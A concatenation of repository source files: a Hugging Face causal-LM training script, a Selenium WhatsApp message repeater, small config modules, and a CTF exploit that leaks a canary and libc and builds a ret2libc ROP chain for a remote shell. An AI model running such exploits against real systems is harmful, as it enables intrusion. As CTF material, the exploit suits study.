MODEL_CONFIG_CLASSES = list(TF_MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
# endregion
# region Command-line arguments
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
)
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_name: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[int] = field(
default=5,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
line_by_line: bool = field(
default=False,
metadata={"help": "Whether distinct lines of text in the dataset are to be handled as distinct sequences."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
def __post_init__(self):
if self.dataset_name is None and self.train_file is None and self.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if self.train_file is not None:
extension = self.train_file.split(".")[-1]
assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file."
if self.validation_file is not None:
extension = self.validation_file.split(".")[-1]
assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file."
# endregion
# region Helper classes
class SavePretrainedCallback(tf.keras.callbacks.Callback):
# Hugging Face models have a save_pretrained() method that saves both the weights and the necessary
# metadata to allow them to be loaded as a pretrained model in future. This is a simple Keras callback
# that saves the model with this method after each epoch.
def __init__(self, output_dir, **kwargs):
super().__init__()
self.output_dir = output_dir
def on_epoch_end(self, epoch, logs=None):
self.model.save_pretrained(self.output_dir)
# endregion
def main():
# region Argument Parsing
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TFTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args, framework="tensorflow")
# Sanity checks
if data_args.dataset_name is None and data_args.train_file is None and data_args.validation_file is None:
raise ValueError("Need either a dataset name or a training/validation file.")
else:
if data_args.train_file is not None:
extension = data_args.train_file.split(".")[-1]
assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, json or txt file."
if data_args.validation_file is not None:
extension = data_args.validation_file.split(".")[-1]
assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, json or txt file."
if training_args.output_dir is not None:
training_args.output_dir = Path(training_args.output_dir)
os.makedirs(training_args.output_dir, exist_ok=True)
# endregion
# region Checkpoints
# Detecting last checkpoint.
checkpoint = None
if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
config_path = training_args.output_dir / CONFIG_NAME
weights_path = training_args.output_dir / TF2_WEIGHTS_NAME
if config_path.is_file() and weights_path.is_file():
checkpoint = training_args.output_dir
logger.info(
f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
" behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
else:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to continue regardless."
)
# endregion
# region Setup logging
# accelerator.is_local_main_process is only True for one process per machine.
logger.setLevel(logging.INFO)
datasets.utils.logging.set_verbosity_warning()
transformers.utils.logging.set_verbosity_info()
# endregion
# If passed along, set the training seed now.
if training_args.seed is not None:
set_seed(training_args.seed)
# region Load datasets
# Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
# (the dataset will be downloaded automatically from the datasets Hub).
#
# For CSV/JSON files, this script will use the column called 'text' or the first column if no column called
# 'text' is found. You can easily tweak this behavior (see below).
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
if data_args.dataset_name is not None:
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
use_auth_token=True if model_args.use_auth_token else None,
)
if "validation" not in raw_datasets.keys():
raw_datasets["validation"] = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
split=f"train[:{data_args.validation_split_percentage}%]",
use_auth_token=True if model_args.use_auth_token else None,
)
raw_datasets["train"] = load_dataset(
data_args.dataset_name,
data_args.dataset_config_name,
split=f"train[{data_args.validation_split_percentage}%:]",
use_auth_token=True if model_args.use_auth_token else None,
)
else:
data_files = {}
dataset_args = {}
if data_args.train_file is not None:
data_files["train"] = data_args.train_file
if data_args.validation_file is not None:
data_files["validation"] = data_args.validation_file
extension = data_args.train_file.split(".")[-1]
if extension == "txt":
extension = "text"
dataset_args["keep_linebreaks"] = data_args.keep_linebreaks
raw_datasets = load_dataset(
extension,
data_files=data_files,
use_auth_token=True if model_args.use_auth_token else None,
**dataset_args,
)
# See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Load pretrained model and tokenizer
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name)
elif model_args.model_name_or_path:
tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# endregion
# region Dataset preprocessing
# First we tokenize all the texts.
column_names = raw_datasets["train"].column_names
text_column_name = "text" if "text" in column_names else column_names[0]
def tokenize_function(examples):
return tokenizer(examples[text_column_name])
tokenized_datasets = raw_datasets.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns=column_names,
load_from_cache_file=not data_args.overwrite_cache,
desc="Running tokenizer on dataset",
)
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
f"The tokenizer picked seems to have a very large `model_max_length` ({tokenizer.model_max_length}). "
"Picking 1024 instead. You can change that default value by passing --block_size xxx."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
# Note that with `batched=True`, this map processes 1,000 texts together, so group_texts throws away a remainder
# for each of those groups of 1,000 texts. You can adjust that batch_size here but a higher value might be slower
# to preprocess.
#
# To speed up this part, we use multiprocessing. See the documentation of the map method for more information:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.map
lm_datasets = tokenized_datasets.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=not data_args.overwrite_cache,
desc=f"Grouping texts in chunks of {block_size}",
)
train_dataset = lm_datasets["train"]
if data_args.validation_file is not None:
eval_dataset = lm_datasets["validation"]
else:
logger.info(
f"Validation file not found: using {data_args.validation_split_percentage}% of the dataset as validation"
" as provided in data_args"
)
train_indices, val_indices = train_test_split(
list(range(len(train_dataset))), test_size=data_args.validation_split_percentage / 100
)
eval_dataset = train_dataset.select(val_indices)
train_dataset = train_dataset.select(train_indices)
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
# Log a few random samples from the training set:
for index in random.sample(range(len(train_dataset)), 3):
logger.info(f"Sample {index} of the training set: {train_dataset[index]}.")
# endregion
with training_args.strategy.scope():
# region Prepare model
if checkpoint is not None:
model = TFAutoModelForCausalLM.from_pretrained(checkpoint, config=config)
elif model_args.model_name_or_path:
model = TFAutoModelForCausalLM.from_pretrained(model_args.model_name_or_path, config=config)
else:
logger.info("Training new model from scratch")
model = TFAutoModelForCausalLM.from_config(config)
model.resize_token_embeddings(len(tokenizer))
# endregion
# region TF Dataset preparation
num_replicas = training_args.strategy.num_replicas_in_sync
data_collator = DefaultDataCollator(return_tensors="tf")
options = tf.data.Options()
options.experimental_distribute.auto_shard_policy = tf.data.experimental.AutoShardPolicy.OFF
tf_train_dataset = train_dataset.to_tf_dataset(
# labels are passed as input, as we will use the model's internal loss
columns=[col for col in train_dataset.features if col != "special_tokens_mask"],
shuffle=True,
batch_size=num_replicas * training_args.per_device_train_batch_size,
collate_fn=data_collator,
drop_remainder=True,
).with_options(options)
tf_eval_dataset = eval_dataset.to_tf_dataset(
# labels are passed as input, as we will use the model's internal loss
columns=[col for col in eval_dataset.features if col != "special_tokens_mask"],
shuffle=False,
batch_size=num_replicas * training_args.per_device_train_batch_size,
collate_fn=data_collator,
drop_remainder=True,
).with_options(options)
# endregion
# region Optimizer and loss
batches_per_epoch = len(train_dataset) // (num_replicas * training_args.per_device_train_batch_size)
# Bias and layernorm weights are automatically excluded from the decay
optimizer, lr_schedule = create_optimizer(
init_lr=training_args.learning_rate,
num_train_steps=int(training_args.num_train_epochs * batches_per_epoch),
num_warmup_steps=training_args.warmup_steps,
adam_beta1=training_args.adam_beta1,
adam_beta2=training_args.adam_beta2,
adam_epsilon=training_args.adam_epsilon,
weight_decay_rate=training_args.weight_decay,
)
# no user-specified loss = will use the model internal loss
model.compile(optimizer=optimizer)
# endregion
# region Training and validation
logger.info("***** Running training *****")
logger.info(f" Num examples = {len(train_dataset)}")
logger.info(f" Num Epochs = {training_args.num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {training_args.per_device_train_batch_size}")
logger.info(f" Total train batch size = {training_args.per_device_train_batch_size * num_replicas}")
history = model.fit(
tf_train_dataset,
validation_data=tf_eval_dataset,
epochs=int(training_args.num_train_epochs),
steps_per_epoch=len(train_dataset) // (training_args.per_device_train_batch_size * num_replicas),
callbacks=[SavePretrainedCallback(output_dir=training_args.output_dir)],
)
try:
train_perplexity = math.exp(history.history["loss"][-1])
except OverflowError:
train_perplexity = math.inf
try:
validation_perplexity = math.exp(history.history["val_loss"][-1])
except OverflowError:
validation_perplexity = math.inf
logger.info(f" Final train loss: {history.history['loss'][-1]:.3f}")
logger.info(f" Final train perplexity: {train_perplexity:.3f}")
logger.info(f" Final validation loss: {history.history['val_loss'][-1]:.3f}")
logger.info(f" Final validation perplexity: {validation_perplexity:.3f}")
# endregion
if training_args.output_dir is not None:
model.save_pretrained(training_args.output_dir)
if training_args.push_to_hub:
# You'll probably want to include some of your own metadata here!
model.push_to_hub()
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | pvcastro.noreply@github.com |
4a90b353d28203a2b13dd7f10e419572b1551633 | 784eca4391204e2352f320d632e29d37ea136f32 | /PracticeCodes/whatsApp.py | b766433acc83e68763c1dd13d356cee6d98734c7 | [] | no_license | JT4life/PythonCodes | e9d7156cff7b58ad6e1fd253cd645e707be6a5d5 | 148229c14b21dc2a34b7f1446b148b1040a84dad | refs/heads/master | 2022-11-07T03:58:07.850557 | 2020-06-15T22:13:10 | 2020-06-15T22:13:10 | 272,554,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from selenium import webdriver
#Download Chrome driver and paste in script folder in python !
driver = webdriver.Chrome()
driver.get('https://web.whatsapp.com/')
name = input('Enter the name of user or group : ')
msg = input('Enter your message : ')
count = int(input('Enter the count : '))
input('Enter anything after scanning QR code')
user = driver.find_element_by_xpath('//span[@title = "{}"]'.format(name))
user.click()
msg_box = driver.find_element_by_class_name('_13mgZ')
for i in range(count):
msg_box.send_keys(msg)
button = driver.find_element_by_class_name('_3M-N-')
button.click()
| [
"joshua_4_life@hotmail.com"
] | joshua_4_life@hotmail.com |
0cf32f19f7a7f9aa59508484ced33b621773e946 | 074421d31af92ae29c7c78bdb7e50f199a38eb9b | /weixin/code/rfid_oss/event_manager/command_code.py | 4db7933b49755753bde7e285fbe6ec665b1b3e52 | [] | no_license | allenforrest/wxbiz | 3f49ce66b37e281fc375f548610aa54a0f73268f | e78df71fbc5d73dd93ba9452d4b54183fe1e7e1f | refs/heads/master | 2016-09-06T15:17:49.420934 | 2013-08-05T13:13:40 | 2013-08-05T13:13:40 | null | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 2,184 | py | #coding=gbk
"""
Copyright (C), 2012-2015, Anything Connected Possibilities
Author: ACP2013
Version: 1.0
Date: 2012-11-22
Description: event manager命令码定义文件
Others:
Key Class&Method List:
1. ....
History:
1. Date:2012-11-22
Author:ACP2013
Modification:新建文件
"""
#OSS 命令码
OSS_BASE = 0x02000000
#一个APP分配0x1000个命令码
EVENT_REPORT_BASE = 0x0
########################################################################
#EVENT MANAGER COMMAND CODE
########################################################################
"""
EVENT_REPORT_COMMAND
data区有1个参数
event_data:上报event数据,pickle编码
没有返回信息
"""
EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 0
"""
EVENT_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 1
"""
EVENT_EXPORT_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 2
"""
EVENT_EXPORT_TASK_QUERY_REQUEST
data区有1个参数
query_req:EventQueryRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_EXPORT_TASK_QUERY_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 3
"""
EVENT_FILTER_LIST_REQUEST
data区没有参数
返回 EventFilterListResponse 的JSON编码
"""
EVENT_FILTER_LIST_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 4
"""
EVENT_IMC_QUERY_EAU_REQUEST
data区有1个参数
query_req:EventImcQueryEauRequest 的JSON编码
返回 EventQueryResponse 的JSON编码
"""
EVENT_IMC_QUERY_EAU_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 5
"""
EVENT_QUERY_TO_IMC_REQUEST,消息格式同 EVENT_QUERY_REQUEST,用于IMC向EAU查询
"""
EVENT_QUERY_TO_IMC_REQUEST = OSS_BASE + EVENT_REPORT_BASE + 6
"""
WEB_EVENT_REPORT_COMMAND,用于WEB相关模块向event manager发送事件
"""
WEB_EVENT_REPORT_COMMAND = OSS_BASE + EVENT_REPORT_BASE + 7
if __name__=='__main__':
print EVENT_QUERY_REQUEST, EVENT_EXPORT_REQUEST, EVENT_EXPORT_TASK_QUERY_REQUEST, EVENT_IMC_QUERY_EAU_REQUEST, WEB_EVENT_REPORT_COMMAND
| [
"allenxu@gmail.com"
] | allenxu@gmail.com |
ec593b0300c2aa722f382c36dbd9335956e4a56d | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/processor/mimetype/enumerations.py | 8547e4fb1a4820fa3604c5a82da52f2bd920b44c | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | # -*- coding: utf-8 -*-
"""
mimetype enumerations module.
"""
from pyrin.core.enumerations import CoreEnum
class MIMETypeEnum(CoreEnum):
"""
mimetype enum.
"""
TEXT = 'text/plain'
HTML = 'text/html'
JAVASCRIPT = 'text/javascript'
OCTET_STREAM = 'application/octet-stream'
JSON = 'application/json'
| [
"mohamadnobakht@gmail.com"
] | mohamadnobakht@gmail.com |
6b5c8c1161631de22919ca67fea10198953e24c0 | 60f1981f8fb7717a92921c0b7404f6eac06b100b | /Pwn/flag/random_rope.py | 680882cfec123c4fd91d1ae75f50f36746659b1c | [] | no_license | MidnightFlag/CTF2021 | 765d73d227c23cea1df2bbf61a95b2c915be41ee | 5b477472b1491ec7351f75b68f3d8883760e4280 | refs/heads/main | 2023-04-08T13:57:29.767417 | 2021-04-19T18:13:29 | 2021-04-19T18:13:29 | 310,705,849 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,680 | py | #!/usr/bin/env python3
from pwn import *
proc = remote("172.17.0.6", 8888)
libc = ELF("./libc-2.28.so")
#proc = process("/home/kali/Documents/SB/MidnightCTF/PWN/pwn/infra/5_random_rope/random_rope")
#libc = ELF("/lib/i386-linux-gnu/libc.so.6")
leak = proc.recvuntil(b":\n\n").decode()
log.info(leak)
log.info("Parsing the leak...")
leak = leak.split("\n")[1].split(":")[1].split(" ")
if int(leak[-5] )< 0:
canary = (1 << 32) + int(leak[-5])
else:
canary = int(leak[-5])
saved_ebp = (1 << 32) + int(leak[-2])
saved_eip = int(leak[-1])
pc_thunk = int(leak[-3])
pad = int(leak[-4])
log.info("Padding 1 : {}".format(hex(pad)))
log.info("Pc_thunk : {}".format(hex(pc_thunk)))
log.info("Canary : {}".format(hex(canary)))
log.info("Saved EBP : {}".format(hex(saved_ebp)))
log.info("Saved EIP : {}".format(hex(saved_eip)))
log.info("Crafting Payload...")
# Step 1 : Locate a print function (puts, puts...) so we can leak a libc function address by passing a GOT function's entry to it as a parameter.
plt_puts = 0x00001050 # Offset between the base addr and the PLT entry for "puts".
post_vuln_call = 0x00001290 # Offset between the base addr and the instruction that follows the call to "vuln", aka the saved_eip while we are in the "vuln" stackframe.
offset_plt_vuln = post_vuln_call - plt_puts # Offset between post_vuln_call and the PLT entry for the "puts" function.
real_plt_puts = saved_eip - offset_plt_vuln # PLT entry for the "puts" function at runtime.
log.info("PLT entry for 'puts' : {}".format(hex(real_plt_puts)))
# Step 2 : Locate the GOT entry for any function of the LIBC, so we can read the entry using "puts" and leak memory
got_puts = 0x00004014 # GOT entry for "scanf"
offset_got_vuln = got_puts - post_vuln_call # Offset between post_vuln_call and the GOT entry for "scanf"
real_got_puts = saved_eip + offset_got_vuln # GOT entry for the "scanf" function at runtime
log.info("GOT entry for 'puts' : {}".format(hex(real_got_puts)))
# Step 3 : Locate the "main" function address, so we can ret2main after leaking the libc and abuse the buffer overflow again.
main_addr = 0x00001259 # Offset between the base addr and the start of the main function
offset_main_vuln = post_vuln_call - main_addr # Offset between the post_vuln_call and the main
ret2main = saved_eip - offset_main_vuln # "main" function address at runtime
log.info("Main address : {}".format(hex(ret2main)))
# Step 4 : Locate a gadget "pop ebx;ret", so we can use it to control paramaters of the functions we want to call.
gadget = 0x0000101e
offset_pop_vuln = post_vuln_call - gadget
real_gadget = saved_eip - offset_pop_vuln
log.info("POP EBX;RET address : {}".format(hex(real_gadget)))
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + plt_puts + pop ebx;ret + got_scanf + ret2main")
# Step 5 : build the payload and leak libc
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP.
payload += p32(real_plt_puts) # Rewrite the saved EIP in order to call puts from the PLT stub.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter for puts.
payload += p32(real_got_puts) # Parameter for puts, which is the GOT entry for the scanf function, leaking the libc. (-1 so we are sure to get the whole thing, and to not crash the program)
payload += p32(ret2main) # Ret2main so we can abuse the buffer overflow again.
log.info("Sending payload...")
proc.sendline(payload)
answer = proc.recvuntil(b':\n\n')
log.info("{}".format(answer))
leak_scanf = u32(answer.split(b"\n\n\n")[2][:4])
log.info("'Scanf' function leak : {}".format(hex(leak_scanf)))
log.info("Locating 'system' function and exploiting the overflow again...")
# Step 6 : compute system() address and find a "/bin/sh" string, so we can jump on system() and get a shell
leak_system = leak_scanf - libc.symbols["puts"] + libc.symbols["system"]
leak_binsh = leak_scanf - libc.symbols["puts"] + next(libc.search(b"/bin/sh\x00"))
log.info("'System' function leak : {}".format(hex(leak_system)))
log.info("'/bin/sh\\x00' found at : {}".format(hex(leak_binsh)))
log.info("Crafting Payload...")
# Step 7 : build the final payload and get the shell
payload = b'A' * 32 # Padding to fill the buffer.
payload += p32(canary) # Rewrite Canary, to avoid the stack smashing detection.
payload += b'JUNK' # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(pc_thunk) # Padding to reach the saved EBP and EIP, because of stack alignment.
payload += p32(saved_ebp) # Rewrite the saved EBP -> that's an old EBP, we could use the new saved_ebp value but that's not a need.
payload += p32(leak_system) # Rewrite the saved EIP in order to call the "system" function from the LIBC.
payload += p32(real_gadget) # Clean the Stack because we passed a parameter.
payload += p32(leak_binsh) # Parameter for system "/bin/sh\x00"
log.info("Payload : A*32 + canary + padding (A*4) + pc_thunk + saved_ebp + system + pop ebx;ret + '/bin/sh'")
log.info("Sending payload...")
proc.sendline(payload)
# Step 8 : enjoy ;)
proc.interactive()
| [
"a@example.com"
] | a@example.com |
6e5ba839aad177f589f4dc24bb5b707e6d35e625 | 89f0df65abe01e273fd7cf0606727c777352ba47 | /Python/code_comp/Programmeringsolympiaden/Kalas/bool mash.py | 310e301ab3cd4f230aa659a223e41781f3dcbaca | [] | no_license | cqann/PRGM | 486122601b959cfbf7d9d2dc2a37caa858cf15a8 | 7387dafb65895528c042a3f1ab605fa5325056ce | refs/heads/master | 2022-02-16T00:59:32.342327 | 2022-01-27T16:55:46 | 2022-01-27T16:55:46 | 226,111,892 | 0 | 1 | null | 2020-11-16T17:41:44 | 2019-12-05T13:45:21 | Python | UTF-8 | Python | false | false | 665 | py | import sys
import time
n_kalas, k = [int(x) for x in sys.stdin.readline().split(" ")]
s_w_h = [int(x) for x in sys.stdin.readline().split(" ")]
w_s = [0]
afford = 0
las = -1
hours = 0
list_w_hours = []
list_w_time = []
for i in range(n_kalas):
cur_kalas = [int(x) for x in sys.stdin.readline().split(" ")]
m_n_w = [x for x in cur_kalas[2:] if x not in w_s]
hours += sum([s_w_h[x-1] for x in m_n_w])
w_s += m_n_w
list_w_hours.append(hours)
afford += (cur_kalas[0]-las-1)*10
list_w_time.append(afford)
las = cur_kalas[0]
if all([x >= y for x,y in zip(list_w_time, list_w_hours)]):
print("Ja")
else:
print("Nej")
| [
"cqann.lindberg@gmail.com"
] | cqann.lindberg@gmail.com |
1da24edb58c87a6f4a8613ad31c9849e3494deae | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/103/usersdata/158/50598/submittedfiles/av1_3.py | d2648f5498338309230c4b00a56edb940359b628 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | # -*- coding: utf-8 -*-
import math
a=int(input('digite a:'))
b=int(input('digite b:'))
cont=0
i=1
for i in range(1,b+1,1):
if a%2==0:
cont=cont+1
i=i+1
if cont==0:
print(i)
else:
print('Nao existe')
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
62bd663ff66daf8ad4c15a4551a219a9bfa76552 | afa456bb3792e433d84684260cdce1dbc6302cde | /authors/apps/article/renderer.py | 0941a3177f37f34445aeaec6aa777ad01913eddf | [
"BSD-3-Clause"
] | permissive | andela/ah-backend-poseidon | 23ac16e9fcdce49f78df04126f9f486b8c39ebd4 | d2b561e83ed1e9a585853f4a4e2e37805e86c35c | refs/heads/develop | 2022-12-09T07:38:04.843476 | 2019-07-19T13:44:13 | 2019-07-19T13:44:13 | 158,799,017 | 1 | 4 | BSD-3-Clause | 2022-12-08T01:19:16 | 2018-11-23T07:55:00 | Python | UTF-8 | Python | false | false | 753 | py | """
Renderer classes go here
"""
import json
from rest_framework.renderers import JSONRenderer
class ArticleJSONRenderer(JSONRenderer):
"""
Override default renderer to customise output
"""
charset = 'utf-8'
def render(self, data, accepted_media_type=None, renderer_context=None):
"""
render response data
:param data:
:param accepted_media_type:
:param renderer_context:
:return:
"""
if isinstance(data, list):
errors = None
else:
errors = data.get('errors', None)
if errors is not None:
return super(ArticleJSONRenderer, self).render(data)
return json.dumps({
'articles': data
})
| [
"ephraim.malinga@gmail.com"
] | ephraim.malinga@gmail.com |
f39c8bd81c9f14438fcaf68af7acdfe08b6002a1 | 30227ff573bcec32644fca1cca42ef4cdd612c3e | /leetcode/binary_tree/tests/test_levelorder_traversal.py | 04f4e411c877f489a2031650a1adce5140460d2b | [] | no_license | saurabh-pandey/AlgoAndDS | bc55864422c93e6c93b8432e483394f286ce8ef2 | dad11dedea9ceb4904d6c2dea801ce0172abfc81 | refs/heads/master | 2023-07-01T09:12:57.951949 | 2023-06-15T12:16:36 | 2023-06-15T12:16:36 | 88,239,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | import pytest
import binary_tree.levelorder_traversal as prob
import binary_tree.operations as bTree
class TestPostorderTraversal:
def test_example1_1(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.createUsingCompleteList(root)
assert prob.levelOrder(rootNode) == res
def test_example1_2(self):
root = [3,9,20,None,None,15,7]
res = [[3],[9,20],[15,7]]
rootNode = bTree.create(root)
assert prob.levelOrder(rootNode) == res | [
"saurabhpandey85@gmail.com"
] | saurabhpandey85@gmail.com |
c56e5bd714efca6e91bff4a72bd13e7dbd1a954a | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5688567749672960_1/Python/frigidrain/A.py | db7c051b27a5e302d31af53d0b46fc3b0d29e195 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | import fileinput
import math
from collections import deque
def flip(n):
res = 0
while(n > 0):
digit = n%10
res = res * 10 + digit
n /= 10
return res
def solve(n):
res = 0
while n > 19:
# print n
